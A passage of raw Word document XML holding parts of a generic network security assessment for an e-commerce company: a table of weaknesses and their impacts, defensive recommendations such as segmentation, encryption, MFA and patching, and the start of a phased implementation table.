          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">merce company. We checked your company's network to find any weak spots and suggest ways to make it safer. We looked at your current setup, policies, and how you protect data.</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2. Current Security Landscape</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While you have some security measures in place, our assessment revealed some key issues that need to be addressed to strengthen your overall security posture:</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325"/>
        <w:gridCol w:w="5520"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="240" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="24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32" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Weakness</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="240" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="24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32" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Potential Impact</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="14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Outdated Systems:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> Some of your security tools are old and need updating.</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This can leave your network vulnerable to known exploits, increasing the risk of data breaches and service disruptions, which can lead to significant financial losses and reputational damage.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="20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Weak Access Control:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> It's not clear who has access to what information.</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This could lead to unauthorized access to sensitive data, potentially resulting in data leaks, manipulation of critical information, or disruption of business operations. For instance, a disgruntled employee might be able to access and leak sensitive custo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">mer data due to inadequate access restrictions.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="17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Missing Incident Response Plan:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> You need a clear plan for dealing with security breaches.</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Without a well-defined incident response plan, your company may struggle to effectively contain and mitigate security incidents, potentially leading to prolonged downtime, data loss, and reputational damage.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="14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Flat Network:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> All your computers and systems are on the same network.</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This makes it easier for attackers to move laterally within your network if they gain access, potentially compromising multiple systems and increasing the impact of a breach.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="17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Combined Servers:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> Your website and customer data are on the same server.</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This increases the risk of both your website and customer data being compromised in a single attack. If your website is targeted, attackers could gain access to sensitive customer information, leading to data breaches and legal liabilities.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="14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Weak Wireless Security:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> Your Wi-Fi network could be more secure.</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Weak wireless security can allow unauthorized access to your network, potentially exposing sensitive data to eavesdropping or allowing attackers to launch attacks from within your network.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="23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No Network Monitoring:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="21"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> You need better ways to detect and respond to attacks.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="55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Without proper network monitoring, you may not be able to detect malicious activity in real-time, potentially allowing attackers to remain undetected and cause significant damage.</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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4. Security Architecture Recommendations</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To address the identified weaknesses and enhance your overall security posture, we recommend implementing the following measures:</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Network Security</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Firewall Upgrade:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upgrade your firewall to a next-generation firewall (NGFW) that provides advanced threat protection capabilities, such as intrusion prevention systems (IPS), deep packet inspection, and application control. This will help to block known threats and preven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">t unauthorized access to your network.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Network Segmentation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create separate networks for different parts of your business (e.g., corporate network, guest network, point-of-sale (POS) network). This will limit the impact of a security breach by preventing attackers from easily moving laterally within your network.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Secure Communication Channels:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilize a Virtual Private Network (VPN) for secure remote access to your network. This will encrypt all communication between remote users and your network, protecting sensitive data from eavesdropping and interception.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Secure Communication:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure all communication channels are secure and use encryption to protect sensitive data during transmission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Data Security</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Data Encryption:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encrypt all sensitive data, both in transit and at rest. Implement data-at-rest encryption (DARE) standards and best practices </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, including the secure storage and management of cryptographic keys, to protect sensitive data from unauthorized access.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Data Backups:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a robust data backup and recovery strategy. Regularly back up all critical data to an offsite location to ensure business continuity in case of data loss due to a security incident or disaster.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Access Control:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict access controls to limit who can access and modify sensitive data. Use the principle of least privilege, granting users only the access they need to perform their job duties.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Data Privacy Controls:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement data privacy controls to protect customer information and comply with relevant privacy regulations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Computer Security</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Security Software:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install and maintain up-to-date security software, including antivirus, anti-malware, and intrusion detection systems, on all computers and devices.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Software Updates:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly update all software to the latest versions to patch security vulnerabilities and protect against known exploits.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Strong Authentication:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce strong passwords and implement multi-factor authentication (MFA)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 for all user accounts. This will add an extra layer of security by requiring users to provide multiple forms of verification before accessing sensitive systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Mix Up Security Credentials:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid using the same username and password for everything. Use a password manager to generate and store strong, unique passwords for each account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w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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Secure Devices:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure all devices, including desktops, laptops, tablets, and mobile devices, are secured with appropriate security software and configurations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Website and Payment Security</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Secure Website and Payment Systems:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure your website and payment systems are secure and compliant with industry standards, such as the Payment Card Industry Data Security Standard (PCI DSS).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Vulnerability Scanning:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly scan your website and payment systems for vulnerabilities and implement necessary security patches to protect against potential attacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Secure Coding Practices:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement secure coding practices to prevent vulnerabilities in your website and applications.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>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Error Handling:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement robust error handling mechanisms in your e-commerce platform to prevent security breaches and ensure data integrity.</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Incident Response</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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Incident Response Plan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Develop a comprehensive incident response plan that outlines the steps to take in case of a security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> incident. This plan should include procedures for identifying, containing, eradicating, and recovering from security incidents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response Team:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Train a dedicated incident response team to handle security incidents. This team should be equipped with the knowledge and skills to effectively respond to various types of cyberattacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>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Plan Testing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly test and update your incident response plan to ensure its effectiveness and address any gaps or weaknesses.</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Cybersecurity Risk Management</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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Risk Assessment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conduct regular cybersecurity risk assessments to identify potential threats and vulnerabilities. This involves evaluating the likelihood and impact of various cyberattacks and prioritizing mitigation efforts based on the level of risk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w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>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Risk Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement appropriate security controls to mitigate identified risks. This may include technical controls, such as firewalls and intrusion detection systems, as well as administrative controls, such as security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="575b5f"/>
          <w:sz w:val="14"/>
          <w:highlight w:val="white"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> policies and user training.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="420" w:line="432" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintenance and Updates</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Reviews:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly review and update your security measures, software, and systems to address emerging threats and vulnerabilities </w:t>
      </w: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w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>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b/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Management:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="1b1c1d"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a patch management process to ensure that all systems and software are updated with the latest security patches in a timely manner.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:br/>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5. Implementation Strategy</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We recommend a phased approach to implementing the security architecture recommendations, allowing you to prioritize critical measures and manage costs effectively:</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705"/>
        <w:gridCol w:w="1425"/>
        <w:gridCol w:w="5220"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="840"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="f0f4f9" w:fill="f0f4f9"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="240" w:type="dxa"/>
              <w:top w:w="240" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
              <w:bottom w:w="240" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="70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32" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0" w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="1b1c1d"/>
                <w:sz w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase</w:t>
